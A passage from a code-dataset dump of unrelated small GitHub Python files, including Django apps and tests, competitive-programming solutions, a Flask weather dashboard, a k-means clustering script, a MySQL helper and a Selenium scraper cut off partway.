    ')\n resp.set_cookie('Anor_Londo', random.randint(10000,9999999999))\n resp.set_cookie('dj4e_cookie', '69b7411e', max_age=1000)\n return resp\n","repo_name":"iiDeSTRoYeR/mysiteProject","sub_path":"mysite/hello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1641177356","text":"from model.project import Project\nimport random\n\n\ndef test_del_project(app):\n if app.project.get_project_list() == 0:\n app.project.create_project(Project(name=\"test\"))\n app.project.confirm()\n old_projects = app.project.get_project_list()\n old_soap_projects = app.soap.get_projects()\n project = random.choice(old_projects)\n app.project.delete_project(project.name)\n new_projects = app.project.get_project_list()\n new_soap_projects = app.soap.get_projects()\n old_soap_projects.remove(project)\n old_projects.remove(project)\n assert sorted(old_projects, key=lambda p: p.name) == sorted(new_projects, key=lambda p: p.name)\n assert sorted(old_soap_projects, key=lambda p: p.name) == sorted(new_soap_projects, key=lambda p: p.name)\n\n\n","repo_name":"alexpodoff/python_training_mantis","sub_path":"test/test_del_project.py","file_name":"test_del_project.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20677608028","text":"choose=input(\"Original [press 0] or New [press 1]?\")\r\nif(choose==1):\r\n filename1 = input(\"input file: \") \r\n filename2 = input(\"Output file: \") \r\nelse:\r\n filename1 = \"Naruto-out-6-dfs\"\r\n filename2 = \"my_out.txt\"\r\n\r\nfile1 = open(filename1).readlines() \r\n \r\nfile1_line = []\r\n \r\n#for lines in file1:\r\n#file1_line.append(lines)\r\nfile1_line=file1[0].split(\",\")\r\nfile2 = open(filename2).readlines() \r\n \r\nfile2_line = []\r\nfile2_line=file2[0].split(\",\")\r\n#for lines in file2:\r\n#file2_line.append(lines)\r\n \r\nn = 0 \r\nif len(file1) > len(file2): \r\n print(\"Length Of File is \",filename1,\"is greater than\",filename2,len(file1),\">\",len(file2)) \r\n for line in file1_line: \r\n if line != file2_line[n]: \r\n print(\"Not Match:\",\"Word :\",n + 1,filename1,\":\",line,\"|\",filename2,\":\",file2_line[n])\r\n n += 1 \r\n else: \r\n n += 1 \r\n \r\n \r\nelif len(file1) < len(file2): \r\n n = 0 \r\n print(\"Length Of File is \",filename1,\"is less than\",filename2,len(file1),\"<\",len(file2)) \r\n for line in file2_line: \r\n if line != file1_line[n]: \r\n print(\"Not Match:\",\"Line :\",n + 1,filename2,\":\",line,\"|\",filename1,\":\",file1_line[n]) \r\n n += 1 \r\n else: \r\n n += 1 \r\n \r\n \r\nelse: \r\n print(\"Length Of File is \",filename1,\"Equals\",filename2,len(file1),\"==\",len(file2))\r\n flag = True;\r\n n = 0 \r\n for line in file1_line: \r\n if line != file2_line[n]: \r\n print(\"Not Match: \",\"Line :\",n + 1,filename1,\":\",line,\"|\",filename2,\":\",file2_line[n])\r\n flag = False;\r\n n += 1 \r\n else: \r\n n += 1\r\n\r\n if(flag):\r\n print(\"Complete Match\")\r\n else:\r\n print(\"File doesn't match on the following above lines\")\r\n","repo_name":"tensor-shock/Data-Structres_and_Algorithms","sub_path":"A4/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7931075230","text":"from django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom apiCandidat import views\n\nurlpatterns = [\n path('candidats/', views.CandidatList.as_view()),\n path('candidats/', views.CandidatDetail.as_view()),\n path('recruteurs/', views.RecruteurList.as_view()),\n path('recruteurs/', views.RecruteurDetail.as_view()),\n path('partenaires/', views.PartenaireList.as_view()),\n path('partenaires/', views.PartenaireDetail.as_view()),\n path('clients/', views.CandidatList.as_view()),\n path('clients/', views.CandidatDetail.as_view()),\n path('offres/', views.OffreList.as_view()),\n path('offres/', views.OffreDetail.as_view()),\n path('meetings/', views.MeetingList.as_view()),\n path('meetings/', views.MeetingDetail.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)","repo_name":"mustaphaezzali/Architeo-chatbot-api","sub_path":"backend/archibotpro/apiCandidat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37742879352","text":"import requests, sys\n\n#Hsa = human KEGG_ID\n#\nserver = \"http://rest.kegg.jp/link/pathway/hsa:\"\n\n#human genes linked from each of the KEGG pathways\n#link/pathway/hsa:10458+ece:Z5100\n# KEGG pathways linked from a human gene and an E. coli O157 gene\n\n#Experimental KgID ENST00000000233.10\n\n#Gets name from ensembl\ndef get_KEGG_pathway(gene_id):\n name = \"name not found\"\n if True: #change to true to download new names\n try:\n r = requests.get(server+gene_id)\n print(r.text)\n if not r.ok:\n r.raise_for_status()\n sys.exit()\n\n #new_name = decoded.get(\"display_name\")\n #name = new_name if new_name else decoded.get(\"description\")\n #if name:\n # name = name.replace(\",\",\"_\")\n # name = name.replace(\" \", \"_\")\n #name = new_name if new_name else name\n #return name\n except requests.exceptions.HTTPError:\n print(\"not found\")\n #name = \"name not found\"\n #return name\n else:\n return name\n\nget_KEGG_pathway(\"160287\")","repo_name":"AndreasAAR/HNSCC_project","sub_path":"Scripts/Deprecated/Get_KEGG_API_pathways.py","file_name":"Get_KEGG_API_pathways.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3446651551","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def inorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n ans=[]\n def inordert(rootnode):\n if not rootnode:\n return \n inordert(rootnode.left)\n ans.append(rootnode.val)\n inordert(rootnode.right)\n inordert(root)\n return ans\n \n ","repo_name":"kibrnew/computative-kb","sub_path":"0094-binary-tree-inorder-traversal/0094-binary-tree-inorder-traversal.py","file_name":"0094-binary-tree-inorder-traversal.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37566899547","text":"import sys\nsys.setrecursionlimit(200000)\n\ninput = sys.stdin.readline\n\ndef inp():\n return (int(input()))\ndef inlt():\n return (list(map(int, input().split())))\ndef insr():\n s = input()\n return (list(s[:len(s) - 1]))\ndef invr():\n return (map(int, input().split()))\n\n\ndef solution():\n n = inp()\n tree = [[] for _ in range(n+1)]\n for i in range(n-1):\n a, b = inlt()\n tree[a].append(b)\n tree[b].append(a)\n q = inp()\n queries = []\n for i in range(q):\n queries.append(inlt())\n\n leaves = [0] * (n + 1)\n\n stack = []\n for node in tree[1]:\n stack.append((node, 1))\n seen = set()\n seen.add(1)\n\n while len(stack) > 0:\n top_node, pre = stack[-1]\n if len(tree[top_node]) == 1:\n leaves[top_node] += 1\n leaves[pre] += leaves[top_node]\n stack.pop()\n elif top_node not in seen:\n seen.add(top_node)\n for node in tree[top_node]:\n if node not in seen:\n stack.append((node, top_node))\n elif top_node in seen:\n leaves[pre] += leaves[top_node]\n stack.pop()\n\n for x, y in queries:\n print(leaves[x] * leaves[y])\n\n\nif __name__ == '__main__':\n t = inp()\n for i in range(t):\n solution()\n","repo_name":"cybsbbb/codeforces_practice","sub_path":"contests/Round881/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33064732631","text":"import os\r\nfrom flask import Flask, render_template, redirect, url_for ,request, flash, json\r\nfrom DbClass import DbClass\r\nfrom DbClass import get_last_temp, get_last_pressure, get_last_humidity,get_last_uvindex,get_last_light,get_last_rain,get_last_windspeed, time_format\r\nfrom DbClass import history_temperature_format, history_airpressure_format, history_humidity_format, history_uv_index_format, history_light_index_format, history_rainfall_format, history_windspeed_format\r\n\r\napp = Flask(__name__)\r\nmysql = DbClass()\r\n\r\n@app.route(\"/\")\r\ndef base():\r\n weather_list = get_db_data()\r\n title = \"Temperature\"\r\n return render_template(\"base.html\", weather_data = weather_list, history_val=history_temperature_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation\")\r\ndef base2():\r\n weather_list = get_db_data()\r\n title = \"Temperature\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_temperature_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/temperature\")\r\ndef temperature():\r\n weather_list = get_db_data()\r\n title = \"Temperature\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_temperature_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/airpressure\")\r\ndef airpressure():\r\n weather_list = get_db_data()\r\n title = \"Airpressure\"\r\n return render_template(\"base.html\", weather_data = weather_list, history_val=history_airpressure_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/humidity\")\r\ndef humidity():\r\n weather_list = get_db_data()\r\n title = \"Humidity\"\r\n return render_template(\"base.html\", weather_data = weather_list, history_val=history_humidity_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/uvindex\")\r\ndef uvindex():\r\n weather_list = get_db_data()\r\n title = \"UV-index\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_uv_index_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/lightindex\")\r\ndef lightindex():\r\n weather_list = get_db_data()\r\n title = \"Light-index\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_light_index_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/rainfall\")\r\ndef rainfall():\r\n weather_list = get_db_data()\r\n title = \"Rainfall [1 = low / 2 = light rain / 3 = heavy rain]\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_rainfall_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/windspeed\")\r\ndef windspeed():\r\n weather_list = get_db_data()\r\n title = \"Windspeed\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_windspeed_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\ndef get_db_data():\r\n data = []\r\n data.append(get_last_temp())\r\n data.append(get_last_pressure())\r\n data.append(get_last_humidity())\r\n data.append(get_last_uvindex())\r\n data.append(get_last_light())\r\n data.append(get_last_rain())\r\n data.append(get_last_windspeed())\r\n return data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, host='0.0.0.0')","repo_name":"orinocoz/Project1WD","sub_path":"Project Git/weatherstation_flask.py","file_name":"weatherstation_flask.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36412711842","text":"import subprocess\nimport argparse\n\nPHYLINC_SCRIPT_PATH = \"/home/sarah/code-workspace/NetRAX/experiments/src/run_phylinc_script.jl\"\n#PHYLINC_SCRIPT_PATH = \"/home/luttersh/NetRAX/experiments/src/run_phylinc_script.jl\"\n\ndef run_phylinc_inference(start_network, msa_file, max_reticulations):\n cmd = \"julia -p 4 \" + PHYLINC_SCRIPT_PATH + \" \" + start_network + \" \" + msa_file + \" \" + str(max_reticulations)\n print(cmd, flush=True)\n\n p = subprocess.run(cmd.split(), stdout=subprocess.PIPE, check=True)\n cmd_output = p.stdout.decode()\n print(cmd_output)\n phylinc_output = cmd_output.splitlines()\n topo_cnt = 0\n inferred_network = \"\"\n runtime_cnt = 0\n runtime = 0\n for i in range(len(phylinc_output)):\n line = phylinc_output[i]\n if topo_cnt == 2:\n inferred_network = line\n topo_cnt = 9999\n if line.startswith(\"Best topology\"):\n topo_cnt += 1\n elif line.startswith(\"Total time elapsed\"):\n runtime_cnt += 1\n if runtime_cnt == 2:\n runtime = line.split(\": \")[1].split(\" seconds\")[0]\n return inferred_network, float(runtime)\n\n\ndef parse_command_line_arguments_phylinc():\n CLI = argparse.ArgumentParser()\n CLI.add_argument(\"--start_network\", type=str)\n CLI.add_argument(\"--msa\", type=str)\n CLI.add_argument(\"--max_reticulations\", type=int, default=5)\n args = CLI.parse_args()\n return args.start_network, args.msa, args.max_reticulations\n\n\nif __name__ == '__main__':\n start_network, msa_file, max_reticulations = parse_command_line_arguments_phylinc()\n inferred_network, runtime = run_phylinc_inference(start_network, msa_file, max_reticulations)\n print(inferred_network)\n print(str(runtime) + \" seconds.\")","repo_name":"lutteropp/NetRAX","sub_path":"experiments/src/phylinc_wrapper.py","file_name":"phylinc_wrapper.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"} +{"seq_id":"12596049021","text":"\"\"\"\n시작 시간: 2022년 4월 11일 오후 5시 50분\n소요 시간: 20분\n풀이 방법:\n 다익스트라\n\"\"\"\nimport heapq\nn, m, c = map(int, input().split())\nconnection = [[] for _ in range(n+1)]\nfor _ in range(m):\n x, y, z = map(int, input().split())\n connection[x].append((y, z)) # (연결 도시, 비용) 추가\n\nqueue = []\nheapq.heappush(queue, (0, c)) # (도달 비용, 도시)\n\nvisited = set()\ncity_count, time_count = -1, 0\nwhile queue:\n time, city = heapq.heappop(queue)\n if city in visited:\n continue\n visited.add(city)\n city_count += 1\n time_count = max(time_count, time)\n for next_city, addtional_costs in connection[city]:\n heapq.heappush(queue, (time+addtional_costs, next_city))\nprint(city_count, time_count)","repo_name":"yuna1212/algorithm","sub_path":"이것이 취업을 위한 코딩 테스트다/최단 경로/전보.py","file_name":"전보.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28351726110","text":"#!/usr/bin/python\n# Author : Wolf Rendall, 2014\n# wrendall@auction.com\n# Auction.com \n\n# This script contains the clustering implementation that takes all the geocoded user actions and returns their primary area of search\n# This is meant to run after beck_user_data.pig and before beck_asset_sort.pig\n\n# Currently we cluser using:\n# Registration ZIP\n# State Notifications\n# Alerts ZIP\n# Bids\n# Saved Searches\n# PDP Views\n# Vault Views\n# We hope to add all searches ASAP\n\nimport sys\nimport numpy as np\n#import datetime # We use this for efficiency testing only\nfrom sklearn.cluster import KMeans\n\n# Define an error checking formula. This will handle missing or weird lat/lons\ndef checkfloat (value):\n try:\n float(value)\n return float(value)\n except ValueError:\n return \"Missing Lat/Lon Value: %s\" %(value)\ndef checkint (value):\n try:\n int(float(value))\n return int(float(value))\n except ValueError:\n return \"Missing Wight Value: %s\" %(value)\n\n#t0 = datetime.datetime.utcnow()\n# input comes from STDIN (standard input)\nfor line in sys.stdin:\n try:\n # remove any leading and trailing whitespace\n line = line.strip()\n # split the line into the email address and the remainder part containing variable number of tuples\n user_id, raw_tuples = line.split(',',1)\n # the whole set of tuples is wrapped in curly braces so strip them off first\n raw_tuples = raw_tuples.strip('({})')\n tuples = raw_tuples.split('),')\n # process each tuple into an array of coords\n obs = []\n for tuple in tuples:\n user_id, action, lat, lon, wgt = tuple.strip('()').split(',',4)\n lat = checkfloat(lat)\n lon = checkfloat(lon)\n wgt = checkint(wgt)\n if type(lat) is float and type(lon) is float and type(wgt) is int:\n row = [lat, lon]\n for i in range(wgt):\n obs.append(row)\n #else: print >> sys.stderr, (user_id,lat,lon)\n\n #Make that array into a numpy array of two columns\n user_actions = np.array(obs)\n #print '%s \\t %s \\n %s' %(user_id, np.size(user_actions), user_actions)\n #Make sure we even need to cluster by requiring 2 or more lat/lon coords\n if np.size(user_actions) > 3:\n number_of_clusters = int(np.floor(min(max(np.sqrt(np.size(user_actions) *0.5),2), 5)))\n #print \" KMeans with %s clusters\" % (number_of_clusters)\n #Important note, it is possible to employ parallelization with the n_jobs arg\n kmeans = KMeans(init='k-means++', n_clusters=number_of_clusters, n_init=10, tol = 0.00001, verbose = 0, n_jobs = 1)\n results = kmeans.fit(user_actions)\n group_labels = results.labels_\n centroids = results.cluster_centers_\n unique_labels = np.unique(group_labels)\n\n #print(group_labels)\n #print(centroids)\n\n ##Get the Einstein Sum of all points in the centroids\n #distances = []\n #for centroid in centroids:\n #coded_actions = np.array(zip(user_actions, labels))\n within_centroid_distances = []\n centroid_size = []\n for label in unique_labels:\n distances = []\n my_centroid = centroids[label]\n members = user_actions[group_labels==label]\n member_count = np.size(members)/2\n centroid_size.append(member_count)\n for member in members:\n distance = np.sqrt(np.square(member[0]-my_centroid[0])+np.square(member[1]-my_centroid[1]))\n distances.append(distance)\n #print('my_centroid:\\t%s\\n member: \\t%s\\n distance:\\t%s') %(my_centroid, member, distance)\n within_centroid_distances.append(np.mean(distances))\n \n #print(within_centroid_distances)\n smallest_cluster_index = np.argmin(centroid_size)\n largest_cluster_index = np.argmax(centroid_size)\n\n #Remove the smallest cluster from consideration\n if len(within_centroid_distances) > 11:\n smallest_cluster_index = np.argmin(centroid_size)\n smallest_cluster_value = centroids[smallest_cluster_index]\n smallest_cluster_distance = within_centroid_distances[smallest_cluster_index]\n centroids = [x for x in centroids if (x[0]+x[1]) != (smallest_cluster_value[0]+smallest_cluster_value[1])]\n within_centroid_distances = [x for x in within_centroid_distances if x != smallest_cluster_distance]\n\n #Find the best cluster of the remaining clusters:\n best_cluster_index = np.argmin(within_centroid_distances)\n final_center = centroids[best_cluster_index]\n\n final_center_size = centroid_size[best_cluster_index]\n largest_cluster_index = np.argmax(centroid_size)\n largest_center_size = centroid_size[largest_cluster_index]\n largest_center = centroids[largest_cluster_index]\n\n #print ('User: %s \\nCentroid: %s \\nBased on %s geocodable actions') % (user_id, final_center, np.size(user_actions)/2)\n #note, the sorting pig script is expecting a file named beck_centroids.tsv\n if largest_center_size < 200:\n print ('%s\\t%s\\t%s') % (user_id, final_center[0], final_center[1])\n else: \n print ('%s\\t%s\\t%s') % (user_id, largest_center[0], largest_center[1])\n #If not enough lat/lon coords, just print the registration geocode\n elif 'row' in locals(): print ('%s\\t%s\\t%s') % (user_id, row[0], row[1])\n #else: print ('User: %s \\nCentroid: %s \\nBased on %s geocodable actions') % (user_id,'Insufficient Data', np.size(user_actions)/2)\n #print 'finished in %s' % (datetime.datetime.utcnow() - t0)\n except ValueError:\n print >> sys.stderr, line\n","repo_name":"kwisatzhaderak/Python","sub_path":"KMEANS_Example.py","file_name":"KMEANS_Example.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35089667617","text":"from fastapi import FastAPI, File\nfrom starlette.responses import Response\n\nfrom classification import get_model\n\nimport io\nfrom PIL import Image\nimport os\n###\nfrom model import DetectorModel\n\nmodel = get_model(\"./inference_models/mobilenet_v2_checkpoint_202101281638.hdf5\")\nmodel_detector_path = \"./inference_models/yolov5s_tomato_3classes.pt\"\n\napp = FastAPI(\n title=\"Plant Disease Detector\",\n description=\"Plant Disease Detector using DL Models\",\n version=\"0.1.0\",\n)\n\n@app.post(\"/classification\")\ndef get_predict_disease_result(file: bytes = File(...)):\n \"\"\"\"\"\"\n image = Image.open(io.BytesIO(file)).convert(\"RGB\")\n pred = model.prediction(image_data=image)\n\n return Response(content=pred, status_code=200)\n\n@app.post(\"/detector\")\ndef get_predict_disease_result_detector(file: bytes = File(...)):\n \"\"\"\"\"\"\n test_img_path = './test_images/'\n result_img_path = './detect_results/'\n test_file = 'test_img.png'\n name_path = 'tomato/'\n\n image = Image.open(io.BytesIO(file)).convert(\"RGB\")\n image.save(test_img_path+test_file)\n\n model_detector = DetectorModel(\n weights=model_detector_path,\n source=test_img_path,\n img_size=416,\n conf_thres=0.5, iou_thres=0.45, device='cpu', view_img=False, save_txt=False,\n save_conf=False, classes=None, agnostic_nms=False, augment=False, update=False,\n project = result_img_path, name=name_path, exist_ok=True\n )\n model_detector.detect()\n\n return Response(content='../backend/' + result_img_path + name_path + test_file, status_code=200)\n","repo_name":"IVADL/PDD-prototype_local","sub_path":"backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20509388973","text":"import MySQLdb\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nconn= MySQLdb.connect(host='localhost',user='root',passwd='chenanzhe',db='web',port=3306,charset='utf8')\ndef insertDB(tableName = None, listOfColumns = [], listOfValues = [], sql = None):\n\tif sql != None:\n\t\tcur = conn.cursor()\n\t\tcur.execute(sql)\n\t\tconn.commit()\n\t\tcur.close()\n\telse:\n\t\tassert len(listOfColumns) == len(listOfValues)\n\t\tcolumns = \",\".join(listOfColumns)\n\t\tvalues = \"'\"\n\t\tvalues += \"','\".join(listOfValues)\n\t\tvalues += \"'\"\n\t\tsql = \"\"\"insert into {0}({1}) values({2})\"\"\".format(tableName,columns,values)\n\t\tcur = conn.cursor()\n\t\tcur.execute(sql)\n\t\tconn.commit()\n\t\tcur.close()\n\ndef searchDB(tableName=None, columns = [], where = None,sql =None):\n\tif sql != None:\n\t\tcur = conn.cursor()\n\t\tcur.execute(sql)\n\t\tresults = cur.fetchall()\n\telse:\n\t\tif where == None and columns == None:\n\t\t\tsql = \"select * from {0}\".format(tableName)\n\t\telif where == None and columns != []:\n\t\t\tcolumns = \",\".join(columns)\n\t\t\tsql = \"select {0} from {1}\".format(columns, tableName)\n\t\telif where != None and columns == []:\n\t\t\tsql = \"select * from {0} where {1}\".format(tableName, where)\n\t\telse:\n\t\t\tcolumns = \",\".join(columns)\n\t\t\tsql = \"select {0} from {1} where {2}\".format(columns, tableName, where)\n\t\tcur = conn.cursor()\n\t\tcur.execute(sql)\n\t\tresults = cur.fetchall()\n\treturn results\n\ndef deleteDB(tableName,where = None):\n\tif where == None :\n\t\tsql = \"delete from {0}\".format(tableName)\n\telse:\n\t\tsql = \"delete from {0} where {1}\".format(tableName, where)\n\tcur = conn.cursor()\n\tcur.execute(sql)\n\tconn.commit()\n\tcur.close()","repo_name":"Fantastiser/shopweb","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6160043958","text":"\"\"\" Test for views\"\"\"\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom product.models import Category, Product\n\n\nclass TestViews(TestCase):\n \"\"\"\n test all views for product App\n \"\"\"\n\n def setUp(self):\n self.user_bob = User.objects.create_user(\n username=\"bob\", first_name=\"bob\", password=\"toto2021\"\n )\n self.user_bob.save()\n self.user_roger = User.objects.create_user(\"roger\")\n self.user_roger.save()\n\n add_category_1 = Category.objects.create(name=\"Pizza\")\n add_category_2 = Category.objects.create(name=\"Fromage\")\n add_category_3 = Category.objects.create(name=\"Test\")\n add_category_4 = Category.objects.create(name=\"Test_2\")\n\n self.add_product_1 = Product.objects.create(\n name=\"Pizza test\",\n image_product=\"https://image.fr\",\n stores=\"OpenClassrooms\",\n url=None,\n nutriscore=\"D\",\n image_nutrient_benchmarks=\"https://image_repere.fr\",\n )\n self.add_product_1.save()\n self.add_product_1.category.add(add_category_1, add_category_3)\n\n add_product_2 = Product.objects.create(\n name=\"Pizza fromage\",\n image_product=\"https://image.fr\",\n stores=\"OpenClassrooms\",\n url=\"https://masuperpizza.fr\",\n nutriscore=\"C\",\n image_nutrient_benchmarks=\"https://image_repere.fr\",\n )\n\n add_product_2.category.add(add_category_1, add_category_2, add_category_3)\n\n add_product_3 = Product.objects.create(\n name=\"Pizza fromage meilleur\",\n image_product=\"https://image.fr\",\n stores=\"OpenClassrooms\",\n url=\"https://masuperpizza.fr\",\n nutriscore=\"A\",\n image_nutrient_benchmarks=\"https://image_repere.fr\",\n )\n\n add_product_3.category.add(add_category_1, add_category_2, add_category_4)\n\n add_product_4 = Product.objects.create(\n name=\"Pizza 5 fromage\",\n image_product=\"https://image.fr\",\n stores=\"OpenClassrooms\",\n url=\"https://masuperpizza.fr\",\n nutriscore=\"A\",\n image_nutrient_benchmarks=\"https://image_repere.fr\",\n )\n add_product_4.category.add(add_category_1, add_category_2, add_category_4)\n\n def test_index(self):\n \"\"\"\n Test index url\n - status_code (200, 301)\n - if login display if not user authentificated\n - if logout display if user authentificated\n \"\"\"\n response = self.client.get(\"\")\n self.assertEqual(response.status_code, 200)\n response = self.client.get(\"/index\")\n self.assertEqual(response.status_code, 301)\n\n # Test display login / logout if user is authentificated\n\n self.client.force_login(User.objects.get_or_create(username=\"testuser\")[0])\n response = self.client.get(\"\")\n icon_log_out = \"fa-sign-out-alt\"\n icon_log_in = \"fa-sign-in-alt\"\n self.assertIn(icon_log_out, response.content.decode(\"utf-8\"))\n self.assertNotIn(icon_log_in, response.content.decode(\"utf-8\"))\n\n self.client.logout()\n response = self.client.get(\"\")\n\n self.assertIn(icon_log_in, response.content.decode(\"utf-8\"))\n self.assertNotIn(icon_log_out, response.content.decode(\"utf-8\"))\n\n def test_legal(self):\n \"\"\"\n Test legal mention url (/legal/)\n - status_code (200, 301)\n \"\"\"\n response = self.client.get(\"/legal/\")\n self.assertEqual(response.status_code, 200)\n\n response = self.client.post(\"/legal/\")\n self.assertEqual(response.status_code, 405)\n\n def test_result(self):\n \"\"\"\n Test result url (/results/) (after search product)\n - status_code (200)\n - if method is get\n - if method is post -> check result\n \"\"\"\n url_result = reverse(\"results\")\n response = self.client.get(url_result)\n self.assertEqual(response.status_code, 200)\n\n # form = SearchProduct(data={'product': 'Pizza test'})\n response = self.client.post(url_result, {\"product\": \"Pizza test\"})\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"products/result.html\")\n self.assertIn(\"Pizza fromage\", response.content.decode(\"utf-8\"))\n\n response = self.client.post(url_result, {\"product\": \"toto\"})\n self.assertEqual(response.status_code, 200)\n\n self.assertIn(\"produit non trouvé\", response.content.decode(\"utf-8\"))\n\n def test_product_info(self):\n \"\"\"\n Test page product info\n - status_code (200)\n \"\"\"\n\n product = Product.objects.first()\n url = f\"/products/{product.id}/\"\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"products/product.html\")\n\n response = self.client.get(\"/products/232323/\")\n self.assertEqual(response.status_code, 200)\n\n def test_save_product(self):\n \"\"\"\n Test save product\n - status_code (200) auth or not auth\n - if method is get\n - if method is post -> check result\n \"\"\"\n product_test = Product.objects.first()\n response = self.client.post(\"/products/save/\", {\"product_id\": product_test.id})\n self.assertEqual(response.status_code, 302)\n\n self.client.force_login(User.objects.get_or_create(username=\"bob\")[0])\n response = self.client.post(\"/products/save/\", {\"product_id\": product_test.id})\n self.assertEqual(response.status_code, 302)\n\n response = self.client.get(\"/accounts/products/\")\n self.assertIn(product_test.name, str(response.content))\n\n response = self.client.post(\"/products/save/\", {\"product_id\": 999})\n self.assertEqual(response.status_code, 404)\n\n def test_list_product(self):\n \"\"\"\n Test list product (/list_product/)\n - status_code (200, 301)\n \"\"\"\n response = self.client.get(\"/list_product/\")\n self.assertEqual(response.status_code, 200)\n\n # Check if len products is 4\n self.assertEqual(len(response.context[\"products\"]), 4)\n\n # Check template used\n self.assertTemplateUsed(response, \"products/list_product.html\")\n\n response = self.client.post(\"/legal/\")\n self.assertEqual(response.status_code, 405)\n\n def test_delete_product_save_success(self):\n \"\"\"\n Test delete product save\n \"\"\"\n # Create 1 product save for user \"bob\"\n\n self.client.force_login(User.objects.get_or_create(username=\"bob\")[0])\n user = User.objects.filter(username='bob').first()\n self.add_product_1.user_save.add(user)\n\n # Request post for delete product 1\n url = f\"/products/{self.add_product_1.id}/\"\n response = self.client.post(url, {\"product_id\": self.add_product_1.id})\n self.assertEqual(response.status_code, 302)\n self.assertEqual(len(user.user_save_products.all()), 0)","repo_name":"Eolynas/pur_beurre","sub_path":"product/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11182698981","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\nimport time\n\nPATH = \"/opt/anaconda3/bin/chromedriver\"\ndriver = webdriver.Chrome(PATH)\n\ndriver.get(\"https://www.walmart.ca/en/lounge-co/N-1275528\")\n\nfile = []\nfile.append([\"product_name\", \"price\", \"available_online\", \"available_instore\", \"rating\", \"num_reviews\"])\n\ntry:\n\tshelfThumbs = WebDriverWait(driver, 10).until(\n\t\tEC.presence_of_element_located((By.ID, \"shelf-thumbs\"))\n\t)\n\tarticles = shelfThumbs.find_elements_by_tag_name(\"article\")\n\ttime.sleep(1)\n\n\tfor article in articles:\n\t\tname = article.find_elements_by_class_name(\"thumb-header\")[0].text\n\t\trating = article.find_elements_by_class_name(\"ratings\")[0].find_elements_by_tag_name(\"div\")[0].get_attribute(\"class\")\n\t\tnum_reviews = article.find_elements_by_class_name(\"review-count\")[0].text\n\t\tprice = article.find_elements_by_class_name(\"price-current\")[0].find_elements_by_tag_name(\"div\")[0].text.replace(\"\\n\", \"\")\n\t\tavailable_online = article.find_elements_by_class_name(\"availability-messages\")[0].find_elements_by_tag_name(\"div\")[0].find_elements_by_tag_name(\"span\")[0].text\n\t\tavailable_instore = article.find_elements_by_class_name(\"availability-messages\")[0].find_elements_by_tag_name(\"div\")[1].text\n\t\t\n\t\tfile.append([name, price, available_online, 